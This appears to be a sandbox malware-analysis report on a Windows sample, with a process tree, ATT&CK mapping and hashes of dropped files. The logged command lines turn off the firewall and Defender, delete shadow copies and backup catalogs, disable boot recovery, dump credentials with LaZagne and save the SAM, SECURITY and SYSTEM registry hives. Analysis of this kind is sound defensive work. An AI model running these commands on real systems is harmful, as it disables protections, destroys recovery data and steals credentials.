- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:2548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    - Kills process with taskkill
    PID:1804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    PID:1128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    PID:600
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2556
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:3056
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:1532
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:872
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:2332
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2712
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- C:\Users\Admin\AppData\Roaming\pass.exe
  "C:\Users\Admin\AppData\Roaming\pass.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
    3⤵
    - Loads dropped DLL
    PID:2980
  - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
      laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
      4⤵
      Executes dropped EXE
      PID:1328
    - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
        
        laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:1008
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\podbll"
        6⤵
        
        PID:2612
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\podbll
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\tdoxcsofyb"
        6⤵
        
        PID:1628
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\tdoxcsofyb
        7⤵
        
        PID:2496
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\oejxtrtdp"
        6⤵
        
        PID:2928
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\oejxtrtdp
        7⤵
        
        PID:2224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe /c " function get-iehistory { [CmdletBinding()] param () $shell = New-Object -ComObject Shell.Application $hist = $shell.NameSpace(34) $folder = $hist.Self $hist.Items() | foreach { if ($_.IsFolder) { $siteFolder = $_.GetFolder $siteFolder.Items() | foreach { $site = $_ if ($site.IsFolder) { $pageFolder = $site.GetFolder $pageFolder.Items() | foreach { $visit = New-Object -TypeName PSObject -Property @{ URL = $($pageFolder.GetDetailsOf($_,0)) } $visit } } } } } } get-iehistory "
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:872
- C:\Users\Admin\AppData\Roaming\steal.exe
  "C:\Users\Admin\AppData\Roaming\steal.exe"
  2⤵
  - Executes dropped EXE
  PID:2104
- - C:\Users\Admin\AppData\Roaming\steal.exe
    "C:\Users\Admin\AppData\Roaming\steal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1948
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1816
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\fzPrj4Sdbujh.bat" "
    3⤵
    PID:2932
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:564
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      Runs ping.exe
      PID:2832
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2912
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\PiuAVumdppb1.bat" "
        5⤵
        
        PID:2400
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:2876
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        Runs ping.exe
        
        PID:3008
      - C:\Users\Admin\AppData\Roaming\server.exe
        
        "C:\Users\Admin\AppData\Roaming\server.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2580
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\4AlZmuZszqfA.bat" "
        7⤵
        
        PID:2540
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2712
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:2900
- C:\Users\Admin\AppData\Roaming\discord.exe
  "C:\Users\Admin\AppData\Roaming\discord.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:896

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2444

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4AlZmuZszqfA.bat

Filesize
200B

MD5
4991eca900141340a2b8a0c281a33dc4

SHA1
b8be2c4d00c24125d34e6d5e40339425b5c6820f

SHA256
22e81f7f560765ed154a93b6b105c25be29a884b86aeda29bad8d35fd80a9d17

SHA512
c8220bd09279a6b25454e10c7895f75b7b002f7db1e8605658ad531c674bddafe59a31704a62d54dd6afd057e3bcedcf126694f845958c9f3758bd67947c89ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD1D.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\PiuAVumdppb1.bat

Filesize
200B

MD5
c11ca33e639ca79c25129b9fd4ce142c

SHA1
ab634c675ca94e0107d28daa59757c897b79afe7

SHA256
41051fefeafce3cd0b376691b255f21b67df4a3b34dfcca56d9871526a104a6c

SHA512
1007d5146cfb20ea3b1621983514b5571b483af9357ab417d5993d11243cae8a3cf09732c346ad18ecf5b258028b122e108cdb0bbf30f90e565215c69b126f79

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE0A.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\VCRUNTIME140.dll

Filesize
87KB

MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-core-file-l1-2-0.dll

Filesize
18KB

MD5
f58b1e1f6168d526473289f5f15cc66f

SHA1
ef9d3d6307dcbfc3b357b2dd30a75b08998c09b5

SHA256
ee778641ebc47383926d62d56612f25487151a183d76e3a2d013f658f6917918

SHA512
1278a6be2baaf05696c22db325faf2c90bc319fcb57daa6fcd2f2d95c1074797247d4a5df4d7e46f7177f1da07e9133f45c61c28e16a71b8d82ff627671b52f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
6a6f368802fefdd7c62cfa942e07ae51

SHA1
1012e2163d64b374fc784cb15205010492879d5d

SHA256
b7e6f1144d596ee1784359f384a3498bab32804add8c24bcf65964b413fb508d

SHA512
0dd5fb0bd23c8215254447d6e77d5bf95df8bf1c2e9f6f27dea1040ca496bd4135b40efe7f3bd4f8ab8300456a582b1596aeaea495dccab8fd4c7acf3c0034d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
ac718755753807cef7c5026dd8a58027

SHA1
4b39d0a3d442fbebcc7ac5fe35d3752dad87f58b

SHA256
b0418241a1c8c2ac1a230d586b0200f9e1033d1833dfd5f48719a1b611ae3fbc

SHA512
ef9b9f04ec1da1c63e1d1e8bdcf3d929dab9725383f58c94554aea801ef39f47c1a97115a57b4ae7390db59a979478940ea9e2b41003796745c0bfb159955a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
19KB

MD5
833aa996973b87eff6cdfea246d22999

SHA1
b89dc8d3f4aa772e32de79bb485c48054aa64361

SHA256
8831b1419c675ac71305ed616fa6aad97b068cc55796d1afc7593a1df2491226

SHA512
dfd12536e519f45294daa070aa35a8b1d32660e718e894f5e782d8bc093911b32f01052a1a9a79746e604b861d3794a4fef3b5bcad900c63460f243ff31fd416

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-core-timezone-l1-1-0.dll

Filesize
18KB

MD5
efc8f224ea2f4af24b13329971cf551f

SHA1
a16fdedefe4bc6201243301624329525199e4f8d

SHA256
fea7c286fb3140a8d8739f2961a524c00dd0ad086f1d4517b74a84d7bb7dc18b

SHA512
5405abb3a52489b0c6a94cc1b840dfae2bded14e53f39bdcd4b8d8f0d8bfa9b43138d5a6eba1a1804d6fc2efe4dd21df1e223d4c77dd07bcafdedd7a4031512e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-crt-heap-l1-1-0.dll

Filesize
19KB

MD5
5bff09fe93358508fe966cf8ca0f81c5

SHA1
da0e180079ed9a23a03b6181f44a6db40f7bba22

SHA256
1ff08dae5644a72047772e616537f4bd80414134944eb49168447e14b83ea9b4

SHA512
cd01bf9db64cedc6ee1abce8e4cc880aa3473961d3c4d5a93b61b514ff9665ed8929b8f2cb4000994bafcd07ae708fec6ae99115e5940b4f95acc0bc865c6cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
23KB

MD5
3424b3cad00b22c071b2bd376084b8b0

SHA1
92cdc77411fa5515d188bd34d921b45e1005b4f8

SHA256
9d42ee159384e8b1aa98bfc5b59a4dcdd808cac13d0ee9457dc5c19d3020c55f

SHA512
69a71d9dc3a27f2a5253ec98cb32d8961a596606c6f260704a7bcfe77aafa590df9da9ebb88b259926e20efbca18f0bbdac5d18ce97e467540591f8e9a5f4b98

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\api-ms-win-crt-string-l1-1-0.dll

Filesize
24KB

MD5
742d61ebf0e70756fb017f80ea8cebcd

SHA1
6cc4d970c3ffd313b57c87a67ce1dda2a8b67432

SHA256
9a14823aa0cbefb03bf9debee20e0f593af5e78d0fe0a6de679146a680e99f29

SHA512
6fc30b6d060fcb3a4dd4852d8e3a2bff405954d17dd8d8b6e0d1ddac7fbe40246836d0785c3ea730eb8dbf17fd3d2dfba68ceef2a798efd846cf23c107335996

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\lazagne.exe.manifest

Filesize
1KB

MD5
6fe7232e13f5f8307c037b54fe0dcc10

SHA1
510075454d9179d1c6669df67f126213aabcb99f

SHA256
4996109560a79774034a05b398d64b1b441c49f0f03682c4683554c59dd47e5c

SHA512
8893febd884f6411025ff9df7d0ef2dbc756baa93903423e805b5e981273838567f2ea60d072d4d98fe9b2f2c25a85800522cebc5e832a3256d4c10605085725

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\python37.dll

Filesize
3.6MB

MD5
c4e99d7375888d873d2478769a8d844c

SHA1
881e42ad9b7da068ee7a6d133484f9d39519ca7e

SHA256
12f26beb439ddf8d56e7544b06a0675d5da6670c02f8f9cede7aad1de71eb116

SHA512
a5b79a919f15cda2c295c8da923ffe5dd30408376e459669e4e376b9d4d504d43671518d7085352bb90c4ce4efc6d81c91ac6cedbdaa896f916d80f7346a695b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13282\ucrtbase.dll

Filesize
970KB

MD5
aad2e99881765464c9ad9ccdbe78f0e0

SHA1
8634ce21a2683674210e836822fda448262e2e16

SHA256
e6287f7ba5892c99da70e9785d320a665809ca8e657a64b9fef1e8afcfb6a2f9

SHA512
68d2e898cdd73a3ad41ef3db7a149588a82629ac0628c07606f009bd6a92a62f9816c995b1794c8a957a4f3c55a72fcab17a400a2f55016a0ee8d773a172d002

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21042\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\fzPrj4Sdbujh.bat

Filesize
200B

MD5
58c0c4287701c9b9632e38c87606efc8

SHA1
f4668ddb6c3db6f7cb3de44aa51680acb584c2f7

SHA256
c766419a68e0e2185883462e63b7982cf90a08aecd605b0d7b7d189a103087aa

SHA512
2496d20896c919a8e55b0662c9e2c3a66bd59ba93b94d5ebcdbcfcbdebb12ea66d0177b83d74de1461067d1e8fb864b84fe3cc17e92fc95312e5024cd9f96706

Download Submit
C:\Users\Admin\AppData\Roaming\LaZagne.exe

Filesize
11.3MB

MD5
282df7bcb720a5b6f409caf9ccda2f75

SHA1
0e62d10ff194e84ed8c6bd71620f56ef9e557072

SHA256
3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

SHA512
74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

Download Submit
C:\Users\Admin\AppData\Roaming\LaZagne.exe

Filesize
11.3MB

MD5
282df7bcb720a5b6f409caf9ccda2f75

SHA1
0e62d10ff194e84ed8c6bd71620f56ef9e557072

SHA256
3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

SHA512
74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

Download Submit
C:\Users\Admin\AppData\Roaming\LaZagne.exe

Filesize
11.3MB

MD5
282df7bcb720a5b6f409caf9ccda2f75

SHA1
0e62d10ff194e84ed8c6bd71620f56ef9e557072

SHA256
3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

SHA512
74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SW90OYOK48JZG11QFV5E.temp

Filesize
7KB

MD5
263bdc574182ab08440747c47518b8ea

SHA1
56355222dc4d0db12cadb47fa09ce0f983bc8919

SHA256
a2ea832c2e8d8e256616ef359a4787b183f9990853a93c592f1bb3f70fd765a3

SHA512
8c68bc79d7995444110ebed0c808539bab4f6d4f538edf2e248f1615f6cca8b440885d0d405712583bad4cf906eaf9b4d3d5c19a01ba05822aeff7ece81d1fa7

Download Submit
C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll

Filesize
111KB

MD5
b59b0f6193bcc7e78a3b2fc730196be3

SHA1
045469fec2df2a9c75b550984a0ed32db2e9f846

SHA256
003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

SHA512
73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

Download Submit
C:\Users\Admin\AppData\Roaming\boot.bin

Filesize
512B

MD5
7e89a982bcd00a382618fc7fa2fb1dde

SHA1
c555b4adff4a222a966a1ec1203cb3ff62704c14

SHA256
4e968ac07f20c83316a8dfcfbdff5d377bcd67609a4ce183cbb0ce831752593b

SHA512
bfa1738a01b4df125f491b9fcfff878d5a74c1e4aa1cb91ee8f5939a4d07fb820c6a6c1370f586d9222e10cb5480cd7a587dd2ae1310c795c0e9c38c51a6eb61

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
3.2MB

MD5
d4f4d96f03146037d58f231f7aab6a2f

SHA1
260110caede0bfb2fd1bd74f2fef550ae105edc2

SHA256
0dc2bd8c5837b30498f27bb247adc22fdabd84c6fd9bda130f7f6580b380c641

SHA512
9ac4ee0771ca1bdcc6b3121e932eb18fe6ec0269851077836b5b0306cd14ed5b879379b6554f28c7a2855f74cbce7c3399d4502e6d176ab551f742645e917870

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe

Filesize
3.2MB

MD5
d4f4d96f03146037d58f231f7aab6a2f

SHA1
260110caede0bfb2fd1bd74f2fef550ae105edc2

SHA256
0dc2bd8c5837b30498f27bb247adc22fdabd84c6fd9bda130f7f6580b380c641

SHA512
9ac4ee0771ca1bdcc6b3121e932eb18fe6ec0269851077836b5b0306cd14ed5b879379b6554f28c7a2855f74cbce7c3399d4502e6d176ab551f742645e917870

Download Submit
C:\Users\Admin\AppData\Roaming\lm.exe

Filesize
39KB

MD5
86e3192ad129a388e4f0ac864e84df78

SHA1
70a2b1422b583c2d768a6f816905bc85687ced52

SHA256
4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

SHA512
f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

Download Submit
C:\Users\Admin\AppData\Roaming\lm.exe

Filesize
39KB

MD5
86e3192ad129a388e4f0ac864e84df78

SHA1
70a2b1422b583c2d768a6f816905bc85687ced52

SHA256
4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

SHA512
f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

Download Submit
C:\Users\Admin\AppData\Roaming\mbr.exe

Filesize
101KB

MD5
00e306f18b8cc56f347f34a7ebaf7f9f

SHA1
2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

SHA256
ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

SHA512
2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

Download Submit
C:\Users\Admin\AppData\Roaming\mbr.exe

Filesize
101KB

MD5
00e306f18b8cc56f347f34a7ebaf7f9f

SHA1
2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

SHA256
ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

SHA512
2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
15.1MB

MD5
91369839fbea332449d63eaf1fd297f2

SHA1
84cac2ed5fcd81966fd65b3b7b22d83aaa2d7df5

SHA256
b336f8cbefce0c9a20f346a258c63ff55c75e74ff39802a194439af1556fba97

SHA512
84804012506ac0c8caeb3cbb7c30645b7f8ac7f1aa48041354f3349e401922dfdba6fe21f4f3963da409fcc0020d0c53ff5e5843dd0511db8165790b5984ba98

Download Submit
C:\Users\Admin\AppData\Roaming\pass.exe

Filesize
15.1MB

MD5
91369839fbea332449d63eaf1fd297f2

SHA1
84cac2ed5fcd81966fd65b3b7b22d83aaa2d7df5

SHA256
b336f8cbefce0c9a20f346a258c63ff55c75e74ff39802a194439af1556fba97

SHA512
84804012506ac0c8caeb3cbb7c30645b7f8ac7f1aa48041354f3349e401922dfdba6fe21f4f3963da409fcc0020d0c53ff5e5843dd0511db8165790b5984ba98

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
3.1MB

MD5
c8db5668140e835a48ca1ef55201f104

SHA1
b23e3dd6326074e2aff13eaae0fb71910e04968c

SHA256
d452df4b9c55782a21a75c0870c0b0a920c843668d6e1a335ccaeeeb7057dd9e

SHA512
f1472bd66e74af132ec1b0872e00f0dc6cf0215db8b21ec4bf7c935a69ffe43347bba2bc605bab7916e72620395f4aae5dd325bf34b5c57dd6df6b4e5e0b1d90

Download Submit
C:\Users\Admin\AppData\Roaming\server.exe

Filesize
3.1MB

MD5
c8db5668140e835a48ca1ef55201f104

SHA1
b23e3dd6326074e2aff13eaae0fb71910e04968c

SHA256
d452df4b9c55782a21a75c0870c0b0a920c843668d6e1a335ccaeeeb7057dd9e

SHA512
f1472bd66e74af132ec1b0872e00f0dc6cf0215db8b21ec4bf7c935a69ffe43347bba2bc605bab7916e72620395f4aae5dd325bf34b5c57dd6df6b4e5e0b1d90

Download Submit
C:\Users\Admin\AppData\Roaming\settings.bat

Filesize
67B

MD5
a204d9e5059a5449af7af765d371d6ea

SHA1
cfc6f78545bdc6a1c82491500f1bacfb38bef28c

SHA256
d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

SHA512
d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
17.3MB

MD5
29a3cc2872627241a46208cbd5e3e31f

SHA1
73e8b1ad4f68148b7fae9229e3924396f2ab5672

SHA256
6bcd030ddc778b70c2b00d5e87fbaf9e613c387818d84aeef6711d1891cf4514

SHA512
73c336d1540cdee62ef104d0402c5801e4385bba6bce421861e8fdf8824612433e784d05c597df7e16268850281c5a1a5ebe875f76d8e5fda987f1381777ca05

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
17.3MB

MD5
29a3cc2872627241a46208cbd5e3e31f

SHA1
73e8b1ad4f68148b7fae9229e3924396f2ab5672

SHA256
6bcd030ddc778b70c2b00d5e87fbaf9e613c387818d84aeef6711d1891cf4514

SHA512
73c336d1540cdee62ef104d0402c5801e4385bba6bce421861e8fdf8824612433e784d05c597df7e16268850281c5a1a5ebe875f76d8e5fda987f1381777ca05

Download Submit
C:\Users\Admin\AppData\Roaming\steal.exe

Filesize
17.3MB

MD5
29a3cc2872627241a46208cbd5e3e31f

SHA1
73e8b1ad4f68148b7fae9229e3924396f2ab5672

SHA256
6bcd030ddc778b70c2b00d5e87fbaf9e613c387818d84aeef6711d1891cf4514

SHA512
73c336d1540cdee62ef104d0402c5801e4385bba6bce421861e8fdf8824612433e784d05c597df7e16268850281c5a1a5ebe875f76d8e5fda987f1381777ca05

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
41KB

MD5
84177654d8bbd32fe8132265e7a598ec

SHA1
73bbb239d1449b3af2d7f53614ba456c1add4c9a

SHA256
af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

SHA512
6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
41KB

MD5
84177654d8bbd32fe8132265e7a598ec

SHA1
73bbb239d1449b3af2d7f53614ba456c1add4c9a

SHA256
af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

SHA512
6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

Download Submit
